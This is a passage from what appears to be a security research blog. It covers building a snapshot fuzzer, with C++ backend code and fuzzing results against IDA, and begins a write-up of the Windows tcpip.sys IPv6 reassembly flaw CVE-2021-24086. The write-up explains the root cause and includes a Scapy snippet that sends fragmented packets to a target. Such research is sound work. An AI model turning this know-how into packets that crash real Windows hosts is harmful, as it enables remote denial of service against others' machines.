ExGenRandom!\n"); Backend->Rdx(Backend->Rdrand()); })) { return false; }  I am not a huge fan of this solution because it means you need to know where non-determinism is coming from which is usually hard to figure out in the first place. Another source of non-determinism is the timestamp counter. As far as I can tell, this hasn't led to any major issues though but this might bite us in the future. With the above implemented, I was able to run test cases through the backend end to end which was great. Below I describe some of the problems I solved while testing it. Problem 6: Code coverage breakpoints not free Profiling wtf revealed that my code coverage breakpoints that I thought free were not quite that free. The theory is that they are one-time breakpoints and as a result, you pay for their cost only once. This leads to a warm-up cost that you pay at the start of the run as the fuzzer is discovering sections of code highly reachable. But if you look at it over time, it should become free. The problem in my implementation was in the code used to restore those breakpoints after executing a test case. I tracked the code coverage breakpoints that haven't been hit in a list. When restoring, I would start by restoring every dirty page and I would iterate through this list to reset the code-coverage breakpoints. It turns out this was highly inefficient when you have hundreds of thousands of breakpoints. I did what you usually do when you have a performance problem: I traded CPU time for memory. The answer to this problem is the Ram_t class. The way it works is that every time you add a code coverage breakpoint, it duplicates the page and sets a breakpoint in this page as well as the guest RAM. // // Add a breakpoint to a GPA. // uint8_t *AddBreakpoint(const Gpa_t Gpa) { const Gpa_t AlignedGpa = Gpa.Align(); uint8_t *Page = nullptr; // // Grab the page if we have it in the cache // if (Cache_.contains(Gpa.Align())) { Page = Cache_.at(AlignedGpa); } // // Or allocate and initialize one! // else { Page = (uint8_t *)aligned_alloc(Page::Size, Page::Size); if (Page == nullptr) { fmt::print("Failed to call aligned_alloc.\n"); return nullptr; } const uint8_t *Virgin = Dmp_.GetPhysicalPage(AlignedGpa.U64()) + AlignedGpa.Offset().U64(); if (Virgin == nullptr) { fmt::print( "The dump does not have a page backing GPA {:#x}, exiting.\n", AlignedGpa); return nullptr; } memcpy(Page, Virgin, Page::Size); } // // Apply the breakpoint. // const uint64_t Offset = Gpa.Offset().U64(); Page[Offset] = 0xcc; Cache_.emplace(AlignedGpa, Page); // // And also update the RAM. // Ram_[Gpa.U64()] = 0xcc; return &Page[Offset]; }  When a code coverage breakpoint is hit, the class removes the breakpoint from both of those locations. // // Remove a breakpoint from a GPA. // void RemoveBreakpoint(const Gpa_t Gpa) { const uint8_t *Virgin = GetHvaFromDump(Gpa); uint8_t *Cache = GetHvaFromCache(Gpa); // // Update the RAM. // Ram_[Gpa.U64()] = *Virgin; // // Update the cache. We assume that an entry is available in the cache. // *Cache = *Virgin; }  When you restore dirty memory, you simply iterate through the dirty page and ask the Ram_t class to restore the content of this page. Internally, the class checks if the page has been duplicated and if so it restores from this copy. If it doesn't have, it restores the content from the dump file. This lets us restore code coverage breakpoints at extra memory costs: // // Restore a GPA from the cache or from the dump file if no entry is // available in the cache. // const uint8_t *Restore(const Gpa_t Gpa) { // // Get the HVA for the page we want to restore. // const uint8_t *SrcHva = GetHva(Gpa); // // Get the HVA for the page in RAM. // uint8_t *DstHva = Ram_ + Gpa.Align().U64(); // // It is possible for a GPA to not exist in our cache and in the dump file. // For this to make sense, you have to remember that the crash-dump does not // contain the whole amount of RAM. In which case, the guest OS can decide // to allocate new memory backed by physical pages that were not dumped // because not currently used by the OS. // // When this happens, we simply zero initialize the page as.. this is // basically the best we can do. The hope is that if this behavior is not // correct, the rest of the execution simply explodes pretty fast. // if (!SrcHva) { memset(DstHva, 0, Page::Size); } // // Otherwise, this is straight forward, we restore the source into the // destination. If we had a copy, then that is what we are writing to the // destination, and if we didn't have a copy then we are restoring the // content from the crash-dump. // else { memcpy(DstHva, SrcHva, Page::Size); } // // Return the HVA to the user in case it needs to know about it. // return DstHva; }  Problem 7: Code coverage with IDA I mentioned above that I was using IDA to generate the list of code coverage breakpoints that wtf needed. At first, I thought this was a bulletproof technique but I encountered a pretty annoying bug where IDA was tagging switch-tables as code instead of data. This leads to wtf corrupting switch-tables with cc's and it led to the guest crashing in spectacular ways. I haven't run into this bug with the latest version of IDA yet which was nice. Problem 8: Rounds of optimization After profiling the fuzzer, I noticed that WHvQueryGpaRangeDirtyBitmap was extremely slow for unknown reasons. To fix this, I ended up emulating the feature by mapping memory as read / execute in the EPT and track dirtiness when receiving a memory fault doing a write. HRESULT WhvBackend_t::OnExitReasonMemoryAccess( const WHV_RUN_VP_EXIT_CONTEXT &Exception) { const Gpa_t Gpa = Gpa_t(Exception.MemoryAccess.Gpa); const bool WriteAccess = Exception.MemoryAccess.AccessInfo.AccessType == WHvMemoryAccessWrite; if (!WriteAccess) { fmt::print("Dont know how to handle this fault, exiting.\n"); __debugbreak(); return E_FAIL; } // // Remap the page as writeable. // const WHV_MAP_GPA_RANGE_FLAGS Flags = WHvMapGpaRangeFlagWrite | WHvMapGpaRangeFlagRead | WHvMapGpaRangeFlagExecute; const Gpa_t AlignedGpa = Gpa.Align(); DirtyGpa(AlignedGpa); uint8_t *AlignedHva = PhysTranslate(AlignedGpa); return MapGpaRange(AlignedHva, AlignedGpa, Page::Size, Flags); }  Once fixed, I noticed that WHvTranslateGva also was slower than I expected. This is why I also emulated its behavior by walking the page tables myself: HRESULT WhvBackend_t::TranslateGva(const Gva_t Gva, const WHV_TRANSLATE_GVA_FLAGS, WHV_TRANSLATE_GVA_RESULT &TranslationResult, Gpa_t &Gpa) const { // // Stole most of the logic from @yrp604's code so thx bro. // const VIRTUAL_ADDRESS GuestAddress = Gva.U64(); const MMPTE_HARDWARE Pml4 = GetReg64(WHvX64RegisterCr3); const uint64_t Pml4Base = Pml4.PageFrameNumber * Page::Size; const Gpa_t Pml4eGpa = Gpa_t(Pml4Base + GuestAddress.Pml4Index * 8); const MMPTE_HARDWARE Pml4e = PhysRead8(Pml4eGpa); if (!Pml4e.Present) { TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent; return S_OK; } const uint64_t PdptBase = Pml4e.PageFrameNumber * Page::Size; const Gpa_t PdpteGpa = Gpa_t(PdptBase + GuestAddress.PdPtIndex * 8); const MMPTE_HARDWARE Pdpte = PhysRead8(PdpteGpa); if (!Pdpte.Present) { TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent; return S_OK; } // // huge pages: // 7 (PS) - Page size; must be 1 (otherwise, this entry references a page // directory; see Table 4-1 // const uint64_t PdBase = Pdpte.PageFrameNumber * Page::Size; if (Pdpte.LargePage) { TranslationResult.ResultCode = WHvTranslateGvaResultSuccess; Gpa = Gpa_t(PdBase + (Gva.U64() & 0x3fff'ffff)); return S_OK; } const Gpa_t PdeGpa = Gpa_t(PdBase + GuestAddress.PdIndex * 8); const MMPTE_HARDWARE Pde = PhysRead8(PdeGpa); if (!Pde.Present) { TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent; return S_OK; } // // large pages: // 7 (PS) - Page size; must be 1 (otherwise, this entry references a page // table; see Table 4-18 // const uint64_t PtBase = Pde.PageFrameNumber * Page::Size; if (Pde.LargePage) { TranslationResult.ResultCode = WHvTranslateGvaResultSuccess; Gpa = Gpa_t(PtBase + (Gva.U64() & 0x1f'ffff)); return S_OK; } const Gpa_t PteGpa = Gpa_t(PtBase + GuestAddress.PtIndex * 8); const MMPTE_HARDWARE Pte = PhysRead8(PteGpa); if (!Pte.Present) { TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent; return S_OK; } TranslationResult.ResultCode = WHvTranslateGvaResultSuccess; const uint64_t PageBase = Pte.PageFrameNumber * 0x1000; Gpa = Gpa_t(PageBase + GuestAddress.Offset); return S_OK; }  Collecting dividends Comparing the two backends, whv showed about 15x better performance over bochscpu. I honestly was a bit disappointed as I expected more of a 100x performance increase but I guess it was still a significant perf increase: bochscpu: #1 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 0.0s crash: 0 timeout: 0 cr3: 0 #2 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 12.0s crash: 0 timeout: 0 cr3: 0 #3 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 25.0s crash: 0 timeout: 0 cr3: 0 #4 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 38.0s crash: 0 timeout: 0 cr3: 0 whv: #12 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 6.0s crash: 0 timeout: 0 cr3: 0 #30 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 16.0s crash: 0 timeout: 0 cr3: 0 #48 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 27.0s crash: 0 timeout: 0 cr3: 0 #66 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 37.0s crash: 0 timeout: 0 cr3: 0 #84 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 47.0s crash: 0 timeout: 0 cr3: 0  The speed started to be good enough for me to run it overnight and discover my first few crashes which was exciting even though they were just interr. # 2 fast 2 furious: KVM backend I really wanted to start fuzzing IDA on some proper hardware. It was pretty clear that renting Windows machines in the cloud with nested virtualization enabled wasn't something widespread or cheap. On top of that, I was still disappointed by the performance of whv and so I was eager to see how battle-tested hypervisors like Xen or KVM would measure. I didn't know anything about those VMM but I quickly discovered that KVM was available in the Linux kernel and that it exposed a user-mode API that resembled whv via /dev/kvm. This looked perfect because if it was similar enough to whv I could probably write a backend for it easily. The KVM API powers Firecracker that is a project creating micro vms to run various workloads in the cloud. I assumed that you would need rich features as well as good performance to be the foundation technology of this project. KVM APIs worked very similarly to whv and as a result, I will not repeat the previous part. Instead, I will just walk you through some of the differences and things I enjoyed more with KVM. GPRs available through shared-memory To avoid sending an IOCTL every time you want the value of the guest GPR, KVM allows you to map a shared memory region with the kernel where the registers are laid out: // // Get the size of the shared kvm run structure. // VpMmapSize_ = ioctl(Kvm_, KVM_GET_VCPU_MMAP_SIZE, 0); if (VpMmapSize_ < 0) { perror("Could not get the size of the shared memory region."); return false; } // // Man says: // there is an implicit parameter block that can be obtained by mmap()'ing // the vcpu fd at offset 0, with the size given by KVM_GET_VCPU_MMAP_SIZE. // Run_ = (struct kvm_run *)mmap(nullptr, VpMmapSize_, PROT_READ | PROT_WRITE, MAP_SHARED, Vp_, 0); if (Run_ == nullptr) { perror("mmap VCPU_MMAP_SIZE"); return false; }  On-demand paging Implementing on demand paging with KVM was very easy. It uses userfaultfd and so you can just start a thread that polls and that services the requests: void KvmBackend_t::UffdThreadMain() { while (!UffdThreadStop_) { // // Set up the pool fd with the uffd fd. // struct pollfd PoolFd = {.fd = Uffd_, .events = POLLIN}; int Res = poll(&PoolFd, 1, 6000); if (Res < 0) { // // Sometimes poll returns -EINTR when we are trying to kick off the CPU // out of KVM_RUN. // if (errno == EINTR) { fmt::print("Poll returned EINTR\n"); continue; } perror("poll"); exit(EXIT_FAILURE); } // // This is the timeout, so we loop around to have a chance to check for // UffdThreadStop_. // if (Res == 0) { continue; } // // You get the address of the access that triggered the missing page event // out of a struct uffd_msg that you read in the thread from the uffd. You // can supply as many pages as you want with UFFDIO_COPY or UFFDIO_ZEROPAGE. // Keep in mind that unless you used DONTWAKE then the first of any of those // IOCTLs wakes up the faulting thread. // struct uffd_msg UffdMsg; Res = read(Uffd_, &UffdMsg, sizeof(UffdMsg)); if (Res < 0) { perror("read"); exit(EXIT_FAILURE); } // // Let's ensure we are dealing with what we think we are dealing with. // if (Res != sizeof(UffdMsg) || UffdMsg.event != UFFD_EVENT_PAGEFAULT) { fmt::print("The uffdmsg or the type of event we received is unexpected, " "bailing."); exit(EXIT_FAILURE); } // // Grab the HVA off the message. // const uint64_t Hva = UffdMsg.arg.pagefault.address; // // Compute the GPA from the HVA. // const Gpa_t Gpa = Gpa_t(Hva - uint64_t(Ram_.Hva())); // // Page it in. // RunStats_.UffdPages++; const uint8_t *Src = Ram_.GetHvaFromDump(Gpa); if (Src != nullptr) { const struct uffdio_copy UffdioCopy = { .dst = Hva, .src = uint64_t(Src), .len = Page::Size, }; // // The primary ioctl to resolve userfaults is UFFDIO_COPY. That atomically // copies a page into the userfault registered range and wakes up the // blocked userfaults (unless uffdio_copy.mode & UFFDIO_COPY_MODE_DONTWAKE // is set). Other ioctl works similarly to UFFDIO_COPY. They’re atomic as // in guaranteeing that nothing can see an half copied page since it’ll // keep userfaulting until the copy has finished. // Res = ioctl(Uffd_, UFFDIO_COPY, &UffdioCopy); if (Res < 0) { perror("UFFDIO_COPY"); exit(EXIT_FAILURE); } } else { const struct uffdio_zeropage UffdioZeroPage = { .range = {.start = Hva, .len = Page::Size}}; Res = ioctl(Uffd_, UFFDIO_ZEROPAGE, &UffdioZeroPage); if (Res < 0) { perror("UFFDIO_ZEROPAGE"); exit(EXIT_FAILURE); } } } }  Timeout Another cool thing is that KVM exposes the Performance Monitoring Unit to the guests if the hardware supports it. When the hardware supports it, I am able to program the PMU to trigger an interruption after an arbitrary number of retired instructions. This is useful because when MSR_IA32_FIXED_CTR0 overflows, it triggers a special interruption called a PMI that gets delivered via the vector 0xE of the CPU's IDT. To catch it, we simply break on hal!HalPerfInterrupt: // // This is to catch the PMI interrupt if performance counters are used to // bound execution. // if (!g_Backend->SetBreakpoint("hal!HalpPerfInterrupt", [](Backend_t *Backend) { CrashDetectionPrint("Perf interrupt\n"); Backend->Stop(Timedout_t()); })) { fmt::print("Could not set a breakpoint on hal!HalpPerfInterrupt, but " "carrying on..\n"); }  To make it work you have to program the APIC a little bit and I remember struggling to get the interruption fired. I am still not 100% sure that I got the details fully right but the interruption triggered consistently during my tests and so I called it a day. I would also like to revisit this area in the future as there might be other features I could use for the fuzzer. Problem 9: Running it in the cloud The KVM backend development was done on a laptop in a Hyper-V VM with nested virtualization on. It worked great but it was not powerful and so I wanted to run it on real hardware. After shopping around, I realized that Amazon didn't have any offers that supported nested virtualization and that only Microsoft's Azure had available SKUs with nested virtualization on. I rented one of them to try it out and the hardware didn't support this VMX feature called unrestricted_guest. I can't quite remember why it mattered but it had to do with real mode & the APIC and the way I create memory slots. I had developed the backend assuming this feature would be here and so I didn't use Azure either. Instead, I rented a bare-metal server on vultr for about 100 / mo. The CPU was a Xeon E3-1270v6 processor, 4 cores, 8 threads @ 3.8GHz which seemed good enough for my usage. The hardware had a PMU and that is where I developed the support for it in wtf as well.

I was pretty happy because the fuzzer was running about 10x faster than whv. It is not a fair comparison because those numbers weren't acquired from the same hardware but still:

#123 cov: 25521 corp: 0 exec/s: 12.3 lastcov: 9.0s crash: 0 timeout: 0 cr3: 0
#252 cov: 25521 corp: 0 exec/s: 12.5 lastcov: 19.0s crash: 0 timeout: 0 cr3: 0
#381 cov: 25521 corp: 0 exec/s: 12.5 lastcov: 29.0s crash: 0 timeout: 0 cr3: 0
#510 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 39.0s crash: 0 timeout: 0 cr3: 0
#639 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 49.0s crash: 0 timeout: 0 cr3: 0
#768 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 59.0s crash: 0 timeout: 0 cr3: 0
#897 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 1.1min crash: 0 timeout: 0 cr3: 0


To give you more details, this test case used generated executions of around 195 millions instructions with the following stats (generated by bochscpu):

Run stats:
Instructions executed: 194593453 (260546 unique)
Dirty pages: 9166848 bytes (0 MB)
Memory accesses: 411196757 bytes (24 MB)


Problem 10: Minsetting a 1.6m files corpus

In parallel with coding wtf, I acquired a fairly large corpus made of the weirdest ELF possible. I built this corpus made of 1.6 million ELF files and I now needed to minset it. Because of the way I had architected wtf, minsetting was a serial process. I could have gone the AFL route and generate execution traces that eventually get merged together but I didn't like this idea either.

Instead, I re-architected wtf into a client and a server. The server owns the coverage, the corpus, and the mutator. It just distributes test cases to clients and receives code coverage reports from them. You can see the clients are runners that send back results to the server. All the important state is kept in the server.

This model was nice because it automatically meant that I could fully utilize the hardware I was renting to minset those files. As an example, minsetting this corpus of files with a single core would have probably taken weeks to complete but it took 8 hours with this new architecture:

#1972714 cov: 74065 corp: 3176 (58mb) exec/s: 64.2 (8 nodes) lastcov: 3.0s crash: 49 timeout: 71 cr3: 48 uptime: 8hr


# Wrapping up

In this post we went through the birth of wtf which is a distributed, code-coverage guided, customizable, cross-platform snapshot-based fuzzer designed for attacking user and/or kernel-mode targets running on Microsoft Windows. It also led to writing and open-sourcing a number of other small projects: lockmem, inject, kdmp-parser and symbolizer.

We went from zero to dozens of unique crashes in various IDA components: libdwarf64.dll, dwarf64.dll, elf64.dll and pdb64.dll. The findings were really diverse: null-dereference, stack-overflows, division by zero, infinite loops, use-after-frees, and out-of-bounds accesses. I have compiled all of my findings in the following Github repository: fuzzing-ida75.

I probably fuzzed for an entire month but most of the crashes popped up in the first two weeks. According to lighthouse, I managed to cover about 80% of elf64.dll, 50% of dwarf64.dll and 26% of libdwarf64.dll with a minset of about 2.4k files for a total of 17MB.

Before signing out, I wanted to thank the IDA Hex-Rays team for handling & fixing my reports at an amazing speed. I would highly recommend for you to try out their bounty as I am sure there's a lot to be found.

# Reverse-engineering tcpip.sys: mechanics of a packet of the death (CVE-2021-24086)

15 April 2021 at 15:00

# Introduction

Since the beginning of my journey in computer security I have always been amazed and fascinated by true remote vulnerabilities. By true remotes, I mean bugs that are triggerable remotely without any user interaction. Not even a single click. As a result I am always on the lookout for such vulnerabilities.

On the Tuesday 13th of October 2020, Microsoft released a patch for CVE-2020-16898 which is a vulnerability affecting Windows' tcpip.sys kernel-mode driver dubbed Bad neighbor. Here is the description from Microsoft:

A remote code execution vulnerability exists when the Windows TCP/IP stack improperly
handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could gain
the ability to execute code on the target server or client. To exploit this vulnerability, an attacker would have
to send specially crafted ICMPv6 Router Advertisement packets to a remote Windows computer.
packets.


The vulnerability really did stand out to me: remote vulnerabilities affecting TCP/IP stacks seemed extinct and being able to remotely trigger a memory corruption in the Windows kernel is very interesting for an attacker. Fascinating.

Hadn't diffed Microsoft patches in years I figured it would be a fun exercise to go through. I knew that I wouldn't be the only one working on it as those unicorns get a lot of attention from internet hackers. Indeed, my friend pi3 was so fast to diff the patch, write a PoC and write a blogpost that I didn't even have time to start, oh well :)

That is why when Microsoft blogged about another set of vulnerabilities being fixed in tcpip.sys I figured I might be able to work on those this time. Again, I knew for a fact that I wouldn't be the only one racing to write the first public PoC for CVE-2021-24086 but somehow the internet stayed silent long enough for me to complete this task which is very surprising :)

In this blogpost I will take you on my journey from zero to BSoD. From diffing the patches, reverse-engineering tcpip.sys and fighting our way through writing a PoC for CVE-2021-24086. If you came here for the code, fair enough, it is available on my github: 0vercl0k/CVE-2021-24086.

# TL;DR

For the readers that want to get the scoop, CVE-2021-24086 is a NULL dereference in tcpip!Ipv6pReassembleDatagram that can be triggered remotely by sending a series of specially crafted packets. The issue happens because of the way the code treats the network buffer:

void Ipv6pReassembleDatagram(Packet_t *Packet, Reassembly_t *Reassembly, char OldIrql)
{
// ...
const uint32_t UnfragmentableLength = Reassembly->UnfragmentableLength;
const uint32_t TotalLength = UnfragmentableLength + Reassembly->DataLength;
// …
NetBufferList = (_NET_BUFFER_LIST *)NetioAllocateAndReferenceNetBufferAndNetBufferList(
IppReassemblyNetBufferListsComplete,
Reassembly,
0,
0,
0,
0);
if ( !NetBufferList )
{
// ...
goto Bail_0;
}

FirstNetBuffer = NetBufferList->FirstNetBuffer;
if ( NetioRetreatNetBuffer(FirstNetBuffer, uint16_t(HeaderAndOptionsLength), 0) < 0 )
{
// ...
goto Bail_1;
}

//...
*Buffer = Reassembly->Ipv6;


A fresh NetBufferList (abbreviated NBL) is allocated by NetioAllocateAndReferenceNetBufferAndNetBufferList and NetioRetreatNetBuffer allocates a Memory Descriptor List (abbreviated MDL) of uint16_t(HeaderAndOptionsLength) bytes. This integer truncation from uint32_t is important.

Once the network buffer has been allocated, NdisGetDataBuffer is called to gain access to a contiguous block of data from the fresh network buffer. This time though, HeaderAndOptionsLength is not truncated which allows an attacker to trigger a special condition in NdisGetDataBuffer to make it fail. This condition is hit when uint16_t(HeaderAndOptionsLength) != HeaderAndOptionsLength. When the function fails, it returns NULL and Ipv6pReassembleDatagram blindly trusts this pointer and does a memory write, bugchecking the machine. To pull this off, you need to trick the network stack into receiving an IPv6 fragment with a very large amount of headers. Here is what the bugchecks look like:

KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000d1
(0x0000000000000000,0x0000000000000002,0x0000000000000001,0xFFFFF8054A5CDEBB)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff805473c46a0 cc              int     3

kd> kc
# Call Site
00 nt!DbgBreakPointWithStatus
01 nt!KiBugCheckDebugBreak
02 nt!KeBugCheck2
03 nt!KeBugCheckEx
04 nt!KiBugCheckDispatch
05 nt!KiPageFault
06 tcpip!Ipv6pReassembleDatagram
0e nt!KeExpandKernelStackAndCalloutInternal
0f nt!KeExpandKernelStackAndCalloutEx
11 NDIS!ndisMIndicateNetBufferListsToOpen


For anybody else in for a long ride, let's get to it :)

# Recon

Even though Francisco Falcon already wrote a cool blogpost discussing his work on this case, I have decided to also write up mine; I'll try to cover aspects that are less or not covered in his post like tcpip.sys internals for example.

All right, let's start by the beginning: at this point I don't know anything about tcpip.sys and I don't know anything about the bugs getting patched. Microsoft's blogpost is helpful because it gives us a bunch of clues:

• There are three different vulnerabilities that seemed to involve fragmentation in IPv4 & IPv6,
• Two of them are rated as Remote Code Execution which means that they cause memory corruption somehow,
• One of them causes a DoS which means somehow it likely bugchecks the target.

According to this tweet we also learn that those flaws have been internally found by Microsoft's own @piazzt which is awesome.

Googling around also reveals a bunch more useful information due to the fact that it would seem that Microsoft privately shared with their partners PoCs via the MAPP program.

At this point I decided to focus on the DoS vulnerability (CVE-2021-2486) as a first step. I figured it might be easier to trigger and that I might be able to use the acquired knowledge for triggering it to understand better tcpip.sys and maybe work on the other ones if time and motivation allows.

The next logical step is to diff the patches to identify the fixes.

# Diffing Microsoft patches in 2021

I honestly can't remember the last time I diff'd Microsoft patches. Probably Windows XP / Windows 7 time to be honest. Since then, a lot has changed though. The security updates are now cumulative, which means that packages embed every fix known to date. You can grab packages directly from the Microsoft Update Catalog which is handy. Last but not least, Windows Updates now use forward / reverse differentials; you can read this to know more about what it means.

Extracting and Diffing Windows Patches in 2020 is a great blog post that talks about how to unpack the patches off an update package and how to apply the differentials. The output of this work is basically the tcpip.sys binary before and after the update. If you don't feel like doing this yourself, I've uploaded the two binaries (as well as their respective public PDBs) that you can use to do the diffing yourself: 0vercl0k/CVE-2021-24086/binaries. Also, I have been made aware after publishing this post about the amazing winbindex website which indexes Windows binaries and lets you download them in a click. Here is the index available for tcpip.sys as an example.

Once we have the before and after binaries, a little dance with IDA and the good ol’ BinDiff yields the below:

There aren't a whole lot of changes to look at which is nice, and focusing on Ipv6pReassembleDatagram feels right. Microsoft's workaround mentioned disabling packet reassembly (netsh int ipv6 set global reassemblylimit=0) and this function seems to be reassembling datagrams; close enough right?

After looking at it for a little time, the patched binary introduced this new interesting looking basic block:

It ends with what looks like a comparison with the 0xffff integer and a conditional jump that either bails out or keeps going. This looks very interesting because some articles mentioned that the bug could be triggered with a packet containing a large amount of headers. Not that you should trust those types of news articles as they are usually not technically accurate and sensationalized, but there might be some truth to it. At this point, I felt pretty good about it and decided to stop diffing and start reverse-engineering. I assumed the issue would be some sort of integer overflow / truncation that would be easy to trigger based on the name of the function. We just need to send a big packet right?

# Reverse-engineering tcpip.sys

This is where the real journey and the usual emotional rollercoasters when studying vulnerabilities. I initially thought I would be done with this in a few days, or a week. Oh boy, I was wrong though.

## Baby steps

First thing I did was to prepare a lab environment. I installed a Windows 10 (target) and a Linux VM (attacker), set-up KDNet and kernel debugging to debug the target, installed Wireshark / Scapy (v2.4.4), created a virtual switch which the two VMs are sharing. And... finally loaded tcpip.sys in IDA. The module looked pretty big and complex at first sights - no big surprise there; it implements Windows IPv4 & IPv6 network stack after all. I started the adventure by focusing first on Ipv6pReassembleDatagram. Here is the piece of assembly code that we saw earlier in BinDiff and that looked interesting:

Great, that's a start. Before going deep down the rabbit hole of reverse-engineering, I decided to try to hit the function and be able to debug it with WinDbg. As the function name suggests reassembly I wrote the following code and threw it against my target:

from scapy.all import *

pkt = Ether() / IPv6(dst = 'ff02::1') / UDP() / ('a' * 0x1000)
sendp(fragment6(pkt, 500), iface = 'eth1')


This successfully triggers the breakpoint in WinDbg; neat:

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff8022edcdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

kd> kc
# Call Site
00 tcpip!Ipv6pReassembleDatagram
08 nt!KeExpandKernelStackAndCalloutInternal
09 nt!KeExpandKernelStackAndCalloutEx


We can even observe the fragmented packets in Wireshark which is also pretty cool:

For those that are not familiar with packet fragmentation, it is a mechanism used to chop large packets (larger than the Maximum Transmission Unit) in smaller chunks to be able to be sent across network equipment. The receiving network stack has the burden to stitch them all together in a safe manner (winkwink).

All right, perfect. We have now what I consider a good enough research environment and we can start digging deep into the code. At this point, let's not focus on the vulnerability yet but instead try to understand how the code works, the type of arguments it receives, recover structures and the semantics of important fields, etc. Let's get our HexRays decompilation output pretty.

As you might imagine, this is the part that's the most time consuming. I use a mixture of bottom-up, top-down. Loads of experiments. Commenting the decompiled code as best as I can, challenging myself by asking questions, answering them, rinse & repeat.

## High level overview

Oftentimes, studying code / features in isolation in complex systems is not enough; it only takes you so far. Complex drivers like tcpip.sys are gigantic, carry a lot of state, and are hard to reason about, both in terms of execution and data flow. In this case, there is this sort of size integer, that seems to be related to something that got received and we want to set that to 0xffff. Unfortunately, just focusing on Ipv6pReassembleDatagram and Ipv6pReceiveFragment was not enough for me to make significant progress. It was worth a try though but time to switch gears.

### Zooming out

All right, that's cool, our HexRays decompiled code is getting prettier and prettier; it feels rewarding. We have abused the create new structure feature to lift a bunch of structures. We guessed about the semantics of some of them but most are still unknown. So yeah, let's work smarter.

We know that tcpip.sys receives packets from the network; we don't know exactly how or where from but maybe we don't need to know that much. One of the first questions you might ask yourself is how the kernel stores network data? What structures does it use?

#### NET_BUFFER & NET_BUFFER_LIST

If you have some Windows kernel experience, you might be familiar with NDIS and you might also have heard about some of the APIs and the structures it exposes to users. It is documented because third-parties can develop extensions and drivers to interact with the network stack at various points.

An important structure in this world is NET_BUFFER. This is what it looks like in WinDbg:

kd> dt NDIS!_NET_BUFFER
NDIS!_NET_BUFFER
+0x000 Next             : Ptr64 _NET_BUFFER
+0x008 CurrentMdl       : Ptr64 _MDL
+0x010 CurrentMdlOffset : Uint4B
+0x018 DataLength       : Uint4B
+0x018 stDataLength     : Uint8B
+0x020 MdlChain         : Ptr64 _MDL
+0x028 DataOffset       : Uint4B
+0x030 ChecksumBias     : Uint2B
+0x032 Reserved         : Uint2B
+0x038 NdisPoolHandle   : Ptr64 Void
+0x040 NdisReserved     : [2] Ptr64 Void
+0x050 ProtocolReserved : [6] Ptr64 Void
+0x080 MiniportReserved : [4] Ptr64 Void
+0x0a8 SharedMemoryInfo : Ptr64 _NET_BUFFER_SHARED_MEMORY
+0x0a8 ScatterGatherList : Ptr64 _SCATTER_GATHER_LIST


It can look overwhelming but we don't need to understand every detail. What is important is that the network data are stored in a regular MDL. As MDLs, NET_BUFFER can be chained together which allows the kernel to store a large amount of data in a bunch of non-contiguous chunks of physical memory; virtual memory is the magic wand used to make the data look contiguous. For the readers that are not familiar with Windows kernel development, an MDL is a Windows kernel construct that allows users to map physical memory in a contiguous virtual memory region. Every MDL is actually followed by a list of PFNs (which don't need to be contiguous) that the Windows kernel is able to map in a contiguous virtual memory region; magic.

kd> dt nt!_MDL
+0x000 Next             : Ptr64 _MDL
+0x008 Size             : Int2B
+0x00a MdlFlags         : Int2B
+0x00c AllocationProcessorNumber : Uint2B
+0x00e Reserved         : Uint2B
+0x010 Process          : Ptr64 _EPROCESS
+0x018 MappedSystemVa   : Ptr64 Void
+0x020 StartVa          : Ptr64 Void
+0x028 ByteCount        : Uint4B
+0x02c ByteOffset       : Uint4B


NET_BUFFER_LIST are basically a structure to keep track of a list of NET_BUFFERs as the name suggests:

kd> dt NDIS!_NET_BUFFER_LIST
+0x000 Next             : Ptr64 _NET_BUFFER_LIST
+0x008 FirstNetBuffer   : Ptr64 _NET_BUFFER
+0x010 Context          : Ptr64 _NET_BUFFER_LIST_CONTEXT
+0x018 ParentNetBufferList : Ptr64 _NET_BUFFER_LIST
+0x020 NdisPoolHandle   : Ptr64 Void
+0x030 NdisReserved     : [2] Ptr64 Void
+0x040 ProtocolReserved : [4] Ptr64 Void
+0x060 MiniportReserved : [2] Ptr64 Void
+0x070 Scratch          : Ptr64 Void
+0x078 SourceHandle     : Ptr64 Void
+0x080 NblFlags         : Uint4B
+0x084 ChildRefCount    : Int4B
+0x088 Flags            : Uint4B
+0x08c Status           : Int4B
+0x08c NdisReserved2    : Uint4B
+0x090 NetBufferListInfo : [29] Ptr64 Void


Again, no need to understand every detail, thinking in concepts is good enough. On top of that, Microsoft makes our life easier by providing a very useful WinDbg extension called ndiskd. It exposes two functions to dump NET_BUFFER and NET_BUFFER_LIST: !ndiskd.nb and !ndiskd.nbl respectively. These are a big time saver because they'll take care of walking the various levels of indirection: list of NET_BUFFERs and chains of MDLs.

#### The mechanics of parsing an IPv6 packet

Now that we know where and how network data is stored, we can ask ourselves how IPv6 packet parsing works? I have very little knowledge about networking, but I know that there are various headers that need to be parsed differently and that they can chain together. The layer N tells you what you'll find next.

What I am about to describe is what I have figured out while reverse-engineering as well as what I have observed during debugging it through a bazillions of experiments. Full disclosure: I am no expert so take it with a grain of salt :)

The top level function of interest is IppReceiveHeaderBatch. The first thing it does is to invoke IppReceiveHeadersHelper on every packet that are in the list:

if ( Packet )
{
do
{
Next = Packet->Next;
Packet->Next = 0;
Packet = Next;
}
while ( Next );
}


